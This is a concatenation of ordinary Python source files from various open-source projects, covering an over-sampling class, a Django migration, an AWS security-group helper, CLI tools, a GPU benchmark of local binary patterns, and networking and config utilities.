with replacement. The bootstrap can be generated in a smoothed manner.
Read more in the :ref:`User Guide <random_over_sampler>`.
Parameters
----------
{sampling_strategy}
{random_state}
shrinkage : float or dict, default=None
Parameter controlling the shrinkage applied to the covariance matrix.
when a smoothed bootstrap is generated. The options are:
- if `None`, a normal bootstrap will be generated without perturbation.
It is equivalent to `shrinkage=0` as well;
- if a `float` is given, the shrinkage factor will be used for all
classes to generate the smoothed bootstrap;
- if a `dict` is given, the shrinkage factor will specific for each
class. The key correspond to the targeted class and the value is
the shrinkage factor.
The value needs of the shrinkage parameter needs to be higher or equal
to 0.
.. versionadded:: 0.8
Attributes
----------
sampling_strategy_ : dict
Dictionary containing the information to sample the dataset. The keys
corresponds to the class labels from which to sample and the values
are the number of samples to sample.
sample_indices_ : ndarray of shape (n_new_samples,)
Indices of the samples selected.
.. versionadded:: 0.4
shrinkage_ : dict or None
The per-class shrinkage factor used to generate the smoothed bootstrap
sample. When `shrinkage=None` a normal bootstrap will be generated.
.. versionadded:: 0.8
n_features_in_ : int
Number of features in the input dataset.
.. versionadded:: 0.9
See Also
--------
BorderlineSMOTE : Over-sample using the borderline-SMOTE variant.
SMOTE : Over-sample using SMOTE.
SMOTENC : Over-sample using SMOTE for continuous and categorical features.
SMOTEN : Over-sample using the SMOTE variant specifically for categorical
features only.
SVMSMOTE : Over-sample using SVM-SMOTE variant.
ADASYN : Over-sample using ADASYN.
KMeansSMOTE : Over-sample applying a clustering before to oversample using
SMOTE.
Notes
-----
Supports multi-class resampling by sampling each class independently.
Supports heterogeneous data as object array containing string and numeric
data.
When generating a smoothed bootstrap, this method is also known as Random
Over-Sampling Examples (ROSE) [1]_.
.. warning::
Since smoothed bootstrap are generated by adding a small perturbation
to the drawn samples, this method is not adequate when working with
sparse matrices.
References
----------
.. [1] G Menardi, N. Torelli, "Training and assessing classification
rules with imbalanced data," Data Mining and Knowledge
Discovery, 28(1), pp.92-122, 2014.
Examples
--------
>>> from collections import Counter
>>> from sklearn.datasets import make_classification
>>> from imblearn.over_sampling import \
RandomOverSampler # doctest: +NORMALIZE_WHITESPACE
>>> X, y = make_classification(n_classes=2, class_sep=2,
... weights=[0.1, 0.9], n_informative=3, n_redundant=1, flip_y=0,
... n_features=20, n_clusters_per_class=1, n_samples=1000, random_state=10)
>>> print('Original dataset shape %s' % Counter(y))
Original dataset shape Counter({{1: 900, 0: 100}})
>>> ros = RandomOverSampler(random_state=42)
>>> X_res, y_res = ros.fit_resample(X, y)
>>> print('Resampled dataset shape %s' % Counter(y_res))
Resampled dataset shape Counter({{0: 900, 1: 900}})
"""
@_deprecate_positional_args
def __init__(
self,
*,
sampling_strategy="auto",
random_state=None,
shrinkage=None,
):
super().__init__(sampling_strategy=sampling_strategy)
self.random_state = random_state
self.shrinkage = shrinkage
def _check_X_y(self, X, y):
y, binarize_y = check_target_type(y, indicate_one_vs_all=True)
X, y = self._validate_data(
X,
y,
reset=True,
accept_sparse=["csr", "csc"],
dtype=None,
force_all_finite=False,
)
return X, y, binarize_y
def _fit_resample(self, X, y):
random_state = check_random_state(self.random_state)
if isinstance(self.shrinkage, Real):
self.shrinkage_ = {
klass: self.shrinkage for klass in self.sampling_strategy_
}
elif self.shrinkage is None or isinstance(self.shrinkage, Mapping):
self.shrinkage_ = self.shrinkage
else:
raise ValueError(
f"`shrinkage` should either be a positive floating number or "
f"a dictionary mapping a class to a positive floating number. "
f"Got {repr(self.shrinkage)} instead."
)
if self.shrinkage_ is not None:
missing_shrinkage_keys = (
self.sampling_strategy_.keys() - self.shrinkage_.keys()
)
if missing_shrinkage_keys:
raise ValueError(
f"`shrinkage` should contain a shrinkage factor for "
f"each class that will be resampled. The missing "
f"classes are: {repr(missing_shrinkage_keys)}"
)
for klass, shrink_factor in self.shrinkage_.items():
if shrink_factor < 0:
raise ValueError(
f"The shrinkage factor needs to be >= 0. "
f"Got {shrink_factor} for class {klass}."
)
# smoothed bootstrap imposes to make numerical operation; we need
# to be sure to have only numerical data in X
try:
X = check_array(X, accept_sparse=["csr", "csc"], dtype="numeric")
except ValueError as exc:
raise ValueError(
"When shrinkage is not None, X needs to contain only "
"numerical data to later generate a smoothed bootstrap "
"sample."
) from exc
X_resampled = [X.copy()]
y_resampled = [y.copy()]
sample_indices = range(X.shape[0])
for class_sample, num_samples in self.sampling_strategy_.items():
target_class_indices = np.flatnonzero(y == class_sample)
bootstrap_indices = random_state.choice(
target_class_indices,
size=num_samples,
replace=True,
)
sample_indices = np.append(sample_indices, bootstrap_indices)
if self.shrinkage_ is not None:
# generate a smoothed bootstrap with a perturbation
n_samples, n_features = X.shape
smoothing_constant = (4 / ((n_features + 2) * n_samples)) ** (
1 / (n_features + 4)
)
if sparse.issparse(X):
_, X_class_variance = mean_variance_axis(
X[target_class_indices, :],
axis=0,
)
X_class_scale = np.sqrt(X_class_variance, out=X_class_variance)
else:
X_class_scale = np.std(X[target_class_indices, :], axis=0)
smoothing_matrix = np.diagflat(
self.shrinkage_[class_sample] * smoothing_constant * X_class_scale
)
X_new = random_state.randn(num_samples, n_features)
X_new = X_new.dot(smoothing_matrix) + X[bootstrap_indices, :]
if sparse.issparse(X):
X_new = sparse.csr_matrix(X_new, dtype=X.dtype)
X_resampled.append(X_new)
else:
# generate a bootstrap
X_resampled.append(_safe_indexing(X, bootstrap_indices))
y_resampled.append(_safe_indexing(y, bootstrap_indices))
self.sample_indices_ = np.array(sample_indices)
if sparse.issparse(X):
X_resampled = sparse.vstack(X_resampled, format=X.format)
else:
X_resampled = np.vstack(X_resampled)
y_resampled = np.hstack(y_resampled)
return X_resampled, y_resampled
def _more_tags(self):
return {
"X_types": ["2darray", "string", "sparse", "dataframe"],
"sample_indices": True,
"allow_nan": True,
}
|
phatblat/AbletonLiveMIDIRemoteScripts
|
Push2/session_recording.py
|
# Source Generated with Decompyle++
# File: session_recording.pyc (Python 2.5)
from __future__ import absolute_import
from pushbase.session_recording_component import FixedLengthSessionRecordingComponent
class SessionRecordingComponent(FixedLengthSessionRecordingComponent):
def __init__(self, *a, **k):
super(SessionRecordingComponent, self).__init__(*a, **a)
self.set_trigger_recording_on_release(not (self._record_button.is_pressed))
def set_trigger_recording_on_release(self, trigger_recording):
self._should_trigger_recording = trigger_recording
def _on_record_button_pressed(self):
pass
def _on_record_button_released(self):
if self._should_trigger_recording:
self._trigger_recording()
self._should_trigger_recording = True
|
victor-o-silva/db_file_storage
|
demo_and_tests/model_filefields_example/migrations/0002_auto_20180826_0054.py
|
# Generated by Django 2.1 on 2018-08-26 00:54
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('model_filefields_example', '0001_initial'),
]
operations = [
migrations.AlterField(
model_name='book',
name='cover',
field=models.ImageField(blank=True, null=True, upload_to='model_filefields_example.BookCover/bytes/filename/mimetype'),
),
migrations.AlterField(
model_name='book',
name='index',
field=models.FileField(blank=True, null=True, upload_to='model_filefields_example.BookIndex/bytes/filename/mimetype'),
),
migrations.AlterField(
model_name='book',
name='pages',
field=models.FileField(blank=True, null=True, upload_to='model_filefields_example.BookPages/bytes/filename/mimetype'),
),
migrations.AlterField(
model_name='sounddevice',
name='instruction_manual',
field=models.FileField(blank=True, null=True, upload_to='model_filefields_example.SoundDeviceInstructionManual/bytes/filename/mimetype'),
),
]
|
jhazelwo/python-awscli
|
python2awscli/model/securitygroup.py
|
""" -*- coding: utf-8 -*- """
from python2awscli import bin_aws
from python2awscli.error import AWSNotFound, ParseError, AWSDuplicate
from python2awscli import must
class BaseSecurityGroup(object):
def __init__(self, name, region, vpc, description, inbound=None, outbound=None):
"""
:param name: String, name of SG
:param region: String, AWS region
:param vpc: String, IP of the VPC this SG belongs to
:param description: String
:param inbound: List of dicts, IP Permissions that should exist
:param outbound: List of dicts, IP Permissions that should exist
"""
self.id = None
self.name = name
self.region = region
self.vpc = vpc
self.description = description
self.IpPermissions = []
self.IpPermissionsEgress = []
self.owner = None
self.changed = False
try:
self._get()
except AWSNotFound:
self._create()
self._merge_rules(must.be_list(inbound), self.IpPermissions)
self._merge_rules(must.be_list(outbound), self.IpPermissionsEgress, egress=True)
if self.changed:
self._get()
def _break_out(self, existing):
"""
Undo AWS's rule flattening so we can do simple 'if rule in existing' logic later.
:param existing: List of SG rules as dicts.
:return: List of SG rules as dicts.
"""
spool = list()
for rule in existing:
for ip in rule['IpRanges']:
copy_of_rule = rule.copy()
copy_of_rule['IpRanges'] = [ip]
copy_of_rule['UserIdGroupPairs'] = []
spool.append(copy_of_rule)
for group in rule['UserIdGroupPairs']:
copy_of_rule = rule.copy()
copy_of_rule['IpRanges'] = []
copy_of_rule['UserIdGroupPairs'] = [group]
spool.append(copy_of_rule)
return spool
def _merge_rules(self, requested, active, egress=False):
"""
:param requested: List of dicts, IP Permissions that should exist
:param active: List of dicts, IP Permissions that already exist
:param egress: Bool, addressing outbound rules or not?
:return: Bool
"""
if not isinstance(requested, list):
raise ParseError(
'SecurityGroup {0}, need a list of dicts, instead got "{1}"'.format(self.name, requested))
for rule in requested:
if rule not in active:
self._add_rule(rule, egress)
for active_rule in active:
if active_rule not in requested:
self._rm_rule(active_rule, egress)
return True
def _add_rule(self, ip_permissions, egress):
"""
:param ip_permissions: Dict of IP Permissions
:param egress: Bool
:return: Bool
"""
direction = 'authorize-security-group-ingress'
if egress:
direction = 'authorize-security-group-egress'
command = ['ec2', direction,
'--region', self.region,
'--group-id', self.id,
'--ip-permissions', str(ip_permissions).replace("'", '"')
]
bin_aws(command)
print('Authorized: {0}'.format(ip_permissions)) # TODO: Log(...)
self.changed = True
return True
def _rm_rule(self, ip_permissions, egress):
"""
:param ip_permissions: Dict of IP Permissions
:param egress: Bool
:return: Bool
"""
direction = 'revoke-security-group-ingress'
if egress:
direction = 'revoke-security-group-egress'
command = ['ec2', direction,
'--region', self.region,
'--group-id', self.id,
'--ip-permissions', str(ip_permissions).replace("'", '"')
]
bin_aws(command)
print('Revoked: {0}'.format(ip_permissions)) # TODO: Log(...)
self.changed = True
return True
def _create(self):
"""
Create a Security Group
:return:
"""
# AWS grants all new SGs this default outbound rule "This is pro-human & anti-machine behavior."
default_egress = {
'Ipv6Ranges': [],
'PrefixListIds': [],
'IpRanges': [{'CidrIp': '0.0.0.0/0'}],
'UserIdGroupPairs': [], 'IpProtocol': '-1'
}
command = [
'ec2', 'create-security-group',
'--region', self.region,
'--group-name', self.name,
'--description', self.description,
'--vpc-id', self.vpc
]
try:
self.id = bin_aws(command, key='GroupId')
except AWSDuplicate:
return False # OK if it already exists.
print('Created {0}'.format(command)) # TODO: Log(...)
self.IpPermissions = []
self.IpPermissionsEgress = [default_egress]
self.changed = True
return True
def _get(self):
"""
Get information about Security Group from AWS and update self
:return: Bool
"""
command = ['ec2', 'describe-security-groups', '--region', self.region, '--group-names', self.name]
result = bin_aws(command, key='SecurityGroups', max=1) # will raise NotFound if empty
me = result[0]
self.id = me['GroupId']
self.owner = me['OwnerId']
self.IpPermissions = self._break_out(me['IpPermissions'])
self.IpPermissionsEgress = self._break_out(me['IpPermissionsEgress'])
print('Got {0}'.format(command)) # TODO: Log(...)
return True
def _delete(self):
"""
Delete myself by my own id.
As of 20170114 no other methods call me. You must do `foo._delete()`
:return:
"""
command = ['ec2', 'delete-security-group', '--region', self.region,
# '--dry-run',
'--group-id', self.id
]
bin_aws(command, decode_output=False)
print('Deleted {0}'.format(command)) # TODO: Log(...)
return True
|
kanboard/kanboard-cli
|
kanboard_cli/shell.py
|
# The MIT License (MIT)
#
# Copyright (c) 2016 Frederic Guillot
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
from cliff import app
from cliff import commandmanager
from pbr import version as app_version
import sys
from kanboard_cli.commands import application
from kanboard_cli.commands import project
from kanboard_cli.commands import task
from kanboard_cli import client
class KanboardShell(app.App):
def __init__(self):
super(KanboardShell, self).__init__(
description='Kanboard Command Line Client',
version=app_version.VersionInfo('kanboard_cli').version_string(),
command_manager=commandmanager.CommandManager('kanboard.cli'),
deferred_help=True)
self.client = None
self.is_super_user = True
def build_option_parser(self, description, version, argparse_kwargs=None):
parser = super(KanboardShell, self).build_option_parser(
description, version, argparse_kwargs=argparse_kwargs)
parser.add_argument(
'--url',
metavar='<api url>',
help='Kanboard API URL',
)
parser.add_argument(
'--username',
metavar='<api username>',
help='API username',
)
parser.add_argument(
'--password',
metavar='<api password>',
help='API password/token',
)
parser.add_argument(
'--auth-header',
metavar='<authentication header>',
help='API authentication header',
)
return parser
def initialize_app(self, argv):
client_manager = client.ClientManager(self.options)
self.client = client_manager.get_client()
self.is_super_user = client_manager.is_super_user()
self.command_manager.add_command('app version', application.ShowVersion)
self.command_manager.add_command('app timezone', application.ShowTimezone)
self.command_manager.add_command('project show', project.ShowProject)
self.command_manager.add_command('project list', project.ListProjects)
self.command_manager.add_command('task create', task.CreateTask)
self.command_manager.add_command('task list', task.ListTasks)
def main(argv=sys.argv[1:]):
return KanboardShell().run(argv)
if __name__ == '__main__':
sys.exit(main(sys.argv[1:]))
|
operepo/ope
|
laptop_credential/winsys/tests/test_fs/test_fs.py
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
import os, sys
import tempfile
from winsys._compat import unittest
import uuid
import win32file
from winsys.tests.test_fs import utils
from winsys import fs
class TestFS (unittest.TestCase):
filenames = ["%d" % i for i in range (5)]
def setUp (self):
utils.mktemp ()
for filename in self.filenames:
with open (os.path.join (utils.TEST_ROOT, filename), "w"):
pass
def tearDown (self):
utils.rmtemp ()
def test_glob (self):
import glob
pattern = os.path.join (utils.TEST_ROOT, "*")
self.assertEquals (list (fs.glob (pattern)), glob.glob (pattern))
def test_listdir (self):
import os
fs_version = list (fs.listdir (utils.TEST_ROOT))
os_version = os.listdir (utils.TEST_ROOT)
self.assertEquals (fs_version, os_version, "%s differs from %s" % (fs_version, os_version))
#
# All the other module-level functions are hand-offs
# to the corresponding Entry methods.
#
if __name__ == "__main__":
unittest.main ()
if sys.stdout.isatty (): raw_input ("Press enter...")
|
fierval/KaggleMalware
|
Learning/1dlbp_tests.py
|
import numpy as np
import matplotlib.pylab as plt
from numba import cuda, uint8, int32, uint32, jit
from timeit import default_timer as timer
@cuda.jit('void(uint8[:], int32, int32[:], int32[:])')
def lbp_kernel(input, neighborhood, powers, h):
i = cuda.grid(1)
r = 0
if i < input.shape[0] - 2 * neighborhood:
i += neighborhood
for j in range(i - neighborhood, i):
if input[j] >= input[i]:
r += powers[j - i + neighborhood]
for j in range(i + 1, i + neighborhood + 1):
if input[j] >= input[i]:
r += powers[j - i + neighborhood - 1]
cuda.atomic.add(h, r, 1)
def extract_1dlbp_gpu(input, neighborhood, d_powers):
maxThread = 512
blockDim = maxThread
d_input = cuda.to_device(input)
hist = np.zeros(2 ** (2 * neighborhood), dtype='int32')
gridDim = (len(input) - 2 * neighborhood + blockDim) / blockDim
d_hist = cuda.to_device(hist)
lbp_kernel[gridDim, blockDim](d_input, neighborhood, d_powers, d_hist)
d_hist.to_host()
return hist
def extract_1dlbp_gpu_debug(input, neighborhood, powers, res):
maxThread = 512
blockDim = maxThread
gridDim = (len(input) - 2 * neighborhood + blockDim) / blockDim
for block in range(0, gridDim):
for thread in range(0, blockDim):
r = 0
i = blockDim * block + thread
if i < input.shape[0] - 2 * neighborhood:
i += neighborhood
for j in range(i - neighborhood, i):
if input[j] >= input[i]:
r += powers[j - i + neighborhood]
for j in range(i + 1, i + neighborhood + 1):
if input[j] >= input[i]:
r += powers[j - i + neighborhood - 1]
res[r] += 1
return res
@jit("int32[:](uint8[:], int64, int32[:], int32[:])", nopython=True)
def extract_1dlbp_cpu_jit(input, neighborhood, powers, res):
maxThread = 512
blockDim = maxThread
gridDim = (len(input) - 2 * neighborhood + blockDim) / blockDim
for block in range(0, gridDim):
for thread in range(0, blockDim):
r = 0
i = blockDim * block + thread
if i < input.shape[0] - 2 * neighborhood:
i += neighborhood
for j in range(i - neighborhood, i):
if input[j] >= input[i]:
r += powers[j - i + neighborhood]
for j in range(i + 1, i + neighborhood + 1):
if input[j] >= input[i]:
r += powers[j - i + neighborhood - 1]
res[r] += 1
return res
def extract_1dlbp_cpu(input, neighborhood, p):
"""
Extract the 1d lbp pattern on CPU
"""
res = np.zeros(1 << (2 * neighborhood))
for i in range(neighborhood, len(input) - neighborhood):
left = input[i - neighborhood : i]
right = input[i + 1 : i + neighborhood + 1]
both = np.r_[left, right]
res[np.sum(p [both >= input[i]])] += 1
return res
X = np.arange(3, 7)
X = 10 ** X
neighborhood = 4
cpu_times = np.zeros(X.shape[0])
cpu_times_simple = cpu_times.copy()
cpu_times_jit = cpu_times.copy()
gpu_times = np.zeros(X.shape[0])
p = 1 << np.array(range(0, 2 * neighborhood), dtype='int32')
d_powers = cuda.to_device(p)
for i, x in enumerate(X):
input = np.random.randint(0, 256, size = x).astype(np.uint8)
print "Length: {0}".format(x)
print "--------------"
start = timer()
h_cpu = extract_1dlbp_cpu(input, neighborhood, p)
cpu_times[i] = timer() - start
print "Finished on CPU: time: {0:3.5f}s".format(cpu_times[i])
res = np.zeros(1 << (2 * neighborhood), dtype='int32')
start = timer()
h_cpu_simple = extract_1dlbp_gpu_debug(input, neighborhood, p, res)
cpu_times_simple[i] = timer() - start
print "Finished on CPU (simple): time: {0:3.5f}s".format(cpu_times_simple[i])
res = np.zeros(1 << (2 * neighborhood), dtype='int32')
start = timer()
h_cpu_jit = extract_1dlbp_cpu_jit(input, neighborhood, p, res)
cpu_times_jit[i] = timer() - start
print "Finished on CPU (numba: jit): time: {0:3.5f}s".format(cpu_times_jit[i])
start = timer()
h_gpu = extract_1dlbp_gpu(input, neighborhood, d_powers)
gpu_times[i] = timer() - start
print "Finished on GPU: time: {0:3.5f}s".format(gpu_times[i])
print "All h_cpu == h_gpu: ", (h_cpu_jit == h_gpu).all() and (h_cpu_simple == h_cpu_jit).all() and (h_cpu == h_cpu_jit).all()
print ''
f = plt.figure(figsize=(10, 5))
plt.plot(X, cpu_times, label = "CPU")
plt.plot(X, cpu_times_simple, label = "CPU non-vectorized")
plt.plot(X, cpu_times_jit, label = "CPU jit")
plt.plot(X, gpu_times, label = "GPU")
plt.yscale('log')
plt.xscale('log')
plt.xlabel('input length')
plt.ylabel('time, sec')
plt.legend()
plt.show()
|
hhalmeida/corponovo
|
manage.py
|
#!/usr/bin/env python
import os
import sys
if __name__ == "__main__":
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "corponovo.settings")
try:
from django.core.management import execute_from_command_line
except ImportError:
# The above import may fail for some other reason. Ensure that the
# issue is really that Django is missing to avoid masking other
# exceptions on Python 2.
try:
import django
except ImportError:
raise ImportError(
"Couldn't import Django. Are you sure it's installed and "
"available on your PYTHONPATH environment variable? Did you "
"forget to activate a virtual environment?"
)
raise
execute_from_command_line(sys.argv)
|
jiasir/openstack-trove
|
lib/charmhelpers/contrib/openstack/ip.py
|
from charmhelpers.core.hookenv import (
config,
unit_get,
)
from charmhelpers.contrib.network.ip import (
get_address_in_network,
is_address_in_network,
is_ipv6,
get_ipv6_addr,
)
from charmhelpers.contrib.hahelpers.cluster import is_clustered
PUBLIC = 'public'
INTERNAL = 'int'
ADMIN = 'admin'
_address_map = {
PUBLIC: {
'config': 'os-public-network',
'fallback': 'public-address'
},
INTERNAL: {
'config': 'os-internal-network',
'fallback': 'private-address'
},
ADMIN: {
'config': 'os-admin-network',
'fallback': 'private-address'
}
}
def canonical_url(configs, endpoint_type=PUBLIC):
'''
Returns the correct HTTP URL to this host given the state of HTTPS
configuration, hacluster and charm configuration.
:configs OSTemplateRenderer: A config tempating object to inspect for
a complete https context.
:endpoint_type str: The endpoint type to resolve.
:returns str: Base URL for services on the current service unit.
'''
scheme = 'http'
if 'https' in configs.complete_contexts():
scheme = 'https'
address = resolve_address(endpoint_type)
if is_ipv6(address):
address = "[{}]".format(address)
return '%s://%s' % (scheme, address)
def resolve_address(endpoint_type=PUBLIC):
resolved_address = None
if is_clustered():
if config(_address_map[endpoint_type]['config']) is None:
# Assume vip is simple and pass back directly
resolved_address = config('vip')
else:
for vip in config('vip').split():
if is_address_in_network(
config(_address_map[endpoint_type]['config']),
vip):
resolved_address = vip
else:
if config('prefer-ipv6'):
fallback_addr = get_ipv6_addr()
else:
fallback_addr = unit_get(_address_map[endpoint_type]['fallback'])
resolved_address = get_address_in_network(
config(_address_map[endpoint_type]['config']), fallback_addr)
if resolved_address is None:
raise ValueError('Unable to resolve a suitable IP address'
' based on charm state and configuration')
else:
return resolved_address
|
mylokin/servy
|
servy/utils/dsntool.py
|
import collections
import re
import urlparse
class DSN(collections.MutableMapping):
''' Hold the results of a parsed dsn.
This is very similar to urlparse.ParseResult tuple.
http://docs.python.org/2/library/urlparse.html#results-of-urlparse-and-urlsplit
It exposes the following attributes:
scheme
schemes -- if your scheme has +'s in it, then this will contain a list of schemes split by +
path
paths -- the path segment split by /, so "/foo/bar" would be ["foo", "bar"]
host -- same as hostname (I just like host better)
hostname
hostloc -- host:port
username
password
netloc
query -- a dict of the query string
query_str -- the raw query string
port
fragment
'''
DSN_REGEXP = re.compile(r'^\S+://\S+')
FIELDS = ('scheme', 'netloc', 'path', 'params', 'query', 'fragment')
def __init__(self, dsn, **defaults):
''' Parse a dsn to parts similar to urlparse.
This is a nuts function that can serve as a good basis to parsing a custom dsn
:param dsn: the dsn to parse
:type dsn: str
:param defaults: any values you want to have defaults for if they aren't in the dsn
:type defaults: dict
'''
assert self.DSN_REGEXP.match(dsn), \
"{} is invalid, only full dsn urls (scheme://host...) allowed".format(dsn)
first_colon = dsn.find(':')
scheme = dsn[0:first_colon]
dsn_url = dsn[first_colon+1:]
url = urlparse.urlparse(dsn_url)
options = {}
if url.query:
for k, kv in urlparse.parse_qs(url.query, True, True).iteritems():
if len(kv) > 1:
options[k] = kv
else:
options[k] = kv[0]
self.scheme = scheme
self.hostname = url.hostname
self.path = url.path
self.params = url.params
self.query = options
self.fragment = url.fragment
self.username = url.username
self.password = url.password
self.port = url.port
self.query_str = url.query
for k, v in defaults.iteritems():
self.set_default(k, v)
def __iter__(self):
for f in self.FIELDS:
yield getattr(self, f, '')
def __len__(self):
return len(iter(self))
def __getitem__(self, field):
return getattr(self, field, None)
def __setitem__(self, field, value):
setattr(self, field, value)
def __delitem__(self, field):
delattr(self, field)
@property
def schemes(self):
'''the scheme, split by plus signs'''
return self.scheme.split('+')
@property
def netloc(self):
'''return username:password@hostname:port'''
s = ''
prefix = ''
if self.username:
s += self.username
prefix = '@'
if self.password:
s += ":{}".format(self.password)
prefix = '@'
s += "{}{}".format(prefix, self.hostloc)
return s
@property
def paths(self):
'''the path attribute split by /'''
return filter(None, self.path.split('/'))
@property
def host(self):
'''the hostname, but I like host better'''
return self.hostname
@property
def hostloc(self):
'''return host:port'''
hostloc = self.hostname
if self.port:
hostloc = '{}:{}'.format(hostloc, self.port)
return hostloc
def set_default(self, key, value):
''' Set a default value for key.
This is different than dict's setdefault because it will set default either
if the key doesn't exist, or if the value at the key evaluates to False, so
an empty string or a None will value will be updated.
:param key: the item to update
:type key: str
:param value: the items new value if key has a current value that evaluates to False
'''
if not getattr(self, key, None):
setattr(self, key, value)
def get_url(self):
'''return the dsn back into url form'''
return urlparse.urlunparse((
self.scheme,
self.netloc,
self.path,
self.params,
self.query_str,
self.fragment,
))
def copy(self):
return DSN(self.get_url())
def __str__(self):
return self.get_url()
|
Fusion-Data-Platform/fdp
|
fdp/lib/datasources.py
|
#!/usr/bin/env python2
# -*- coding: utf-8 -*-
"""
Created on Fri Feb 24 12:49:36 2017
@author: drsmith
"""
import os
from .globals import FdpError
def canonicalMachineName(machine=''):
aliases = {'nstxu': ['nstx', 'nstxu', 'nstx-u'],
'diiid': ['diiid', 'diii-d', 'd3d'],
'cmod': ['cmod', 'c-mod']}
for key, value in aliases.items():
if machine.lower() in value:
return key
# invalid machine name
raise FdpError('"{}" is not a valid machine name\n'.format(machine))
MDS_SERVERS = {
'nstxu': {'hostname': 'skylark.pppl.gov',
'port': '8000'},
'diiid': {'hostname': 'atlas.gat.com',
'port': '8000'}
}
EVENT_SERVERS = {
'nstxu': {'hostname': 'skylark.pppl.gov',
'port': '8000'},
'diiid': {'hostname': 'atlas.gat.com',
'port': '8000'},
'ltx': {'hostname': 'lithos.pppl.gov',
'port': '8000'}
}
LOGBOOK_CREDENTIALS = {
'nstxu': {'server': 'sql2008.pppl.gov',
'instance': None,
'username': None,
'password': None,
'database': None,
'port': '62917',
'table': 'entries',
'loginfile': os.path.join(os.getenv('HOME'),
'nstxlogs.sybase_login')
}
}
|
sakura-internet/saklient.python
|
saklient/cloud/models/model_licenseinfo.py
|
# -*- coding:utf-8 -*-
# This code is automatically transpiled by Saklient Translator
import six
from ..client import Client
from .model import Model
from ..resources.resource import Resource
from ..resources.licenseinfo import LicenseInfo
from ...util import Util
import saklient
str = six.text_type
# module saklient.cloud.models.model_licenseinfo
class Model_LicenseInfo(Model):
## ライセンス種別情報を検索するための機能を備えたクラス。
## @private
# @return {str}
def _api_path(self):
return "/product/license"
## @private
# @return {str}
def _root_key(self):
return "LicenseInfo"
## @private
# @return {str}
def _root_key_m(self):
return "LicenseInfo"
## @private
# @return {str}
def _class_name(self):
return "LicenseInfo"
## @private
# @param {any} obj
# @param {bool} wrapped=False
# @return {saklient.cloud.resources.resource.Resource}
def _create_resource_impl(self, obj, wrapped=False):
Util.validate_type(wrapped, "bool")
return LicenseInfo(self._client, obj, wrapped)
## 次に取得するリストの開始オフセットを指定します。
#
# @param {int} offset オフセット
# @return {saklient.cloud.models.model_licenseinfo.Model_LicenseInfo} this
def offset(self, offset):
Util.validate_type(offset, "int")
return self._offset(offset)
## 次に取得するリストの上限レコード数を指定します。
#
# @param {int} count 上限レコード数
# @return {saklient.cloud.models.model_licenseinfo.Model_LicenseInfo} this
def limit(self, count):
Util.validate_type(count, "int")
return self._limit(count)
## Web APIのフィルタリング設定を直接指定します。
#
# @param {str} key キー
# @param {any} value 値
# @param {bool} multiple=False valueに配列を与え、OR条件で完全一致検索する場合にtrueを指定します。通常、valueはスカラ値であいまい検索されます。
# @return {saklient.cloud.models.model_licenseinfo.Model_LicenseInfo}
def filter_by(self, key, value, multiple=False):
Util.validate_type(key, "str")
Util.validate_type(multiple, "bool")
return self._filter_by(key, value, multiple)
## 次のリクエストのために設定されているステートをすべて破棄します。
#
# @return {saklient.cloud.models.model_licenseinfo.Model_LicenseInfo} this
def reset(self):
return self._reset()
## 指定したIDを持つ唯一のリソースを取得します。
#
# @param {str} id
# @return {saklient.cloud.resources.licenseinfo.LicenseInfo} リソースオブジェクト
def get_by_id(self, id):
Util.validate_type(id, "str")
return self._get_by_id(id)
## リソースの検索リクエストを実行し、結果をリストで取得します。
#
# @return {saklient.cloud.resources.licenseinfo.LicenseInfo[]} リソースオブジェクトの配列
def find(self):
return self._find()
## 指定した文字列を名前に含むリソースに絞り込みます。
#
# 大文字・小文字は区別されません。
# 半角スペースで区切られた複数の文字列は、それらをすべて含むことが条件とみなされます。
#
# @todo Implement test case
# @param {str} name
# @return {saklient.cloud.models.model_licenseinfo.Model_LicenseInfo}
def with_name_like(self, name):
Util.validate_type(name, "str")
return self._with_name_like(name)
## 名前でソートします。
#
# @todo Implement test case
# @param {bool} reverse=False
# @return {saklient.cloud.models.model_licenseinfo.Model_LicenseInfo}
def sort_by_name(self, reverse=False):
Util.validate_type(reverse, "bool")
return self._sort_by_name(reverse)
## @ignore
# @param {saklient.cloud.client.Client} client
def __init__(self, client):
super(Model_LicenseInfo, self).__init__(client)
Util.validate_type(client, "saklient.cloud.client.Client")
|
jsubpy/jsub
|
jsub/operation/submit.py
|
import os
import logging
from jsub.util import safe_mkdir
from jsub.util import safe_rmdir
class Submit(object):
def __init__(self, manager, task_id, sub_ids=None, dry_run=False, resubmit=False):
self.__manager = manager
self.__task = self.__manager.load_task(task_id)
self.__sub_ids = sub_ids
self.__dry_run = dry_run
self.__resubmit = resubmit
self.__logger = logging.getLogger('JSUB')
if self.__sub_ids==None:
self.__sub_ids=range(len(self.__task.data['jobvar']))
self.__initialize_manager()
def __initialize_manager(self):
self.__config_mgr = self.__manager.load_config_manager()
self.__backend_mgr = self.__manager.load_backend_manager()
self.__bootstrap_mgr = self.__manager.load_bootstrap_manager()
self.__navigator_mgr = self.__manager.load_navigator_manager()
self.__context_mgr = self.__manager.load_context_manager()
self.__action_mgr = self.__manager.load_action_manager()
self.__launcher_mgr = self.__manager.load_launcher_manager()
def handle(self):
run_root = self.__backend_mgr.get_run_root(self.__task.data['backend'], self.__task.data['id'])
main_root = os.path.join(run_root, 'main')
safe_rmdir(main_root)
safe_mkdir(main_root)
self.__create_input(main_root)
self.__create_context(main_root)
self.__create_action(main_root)
self.__create_navigator(main_root)
self.__create_bootstrap(main_root)
launcher_param = self.__create_launcher(run_root)
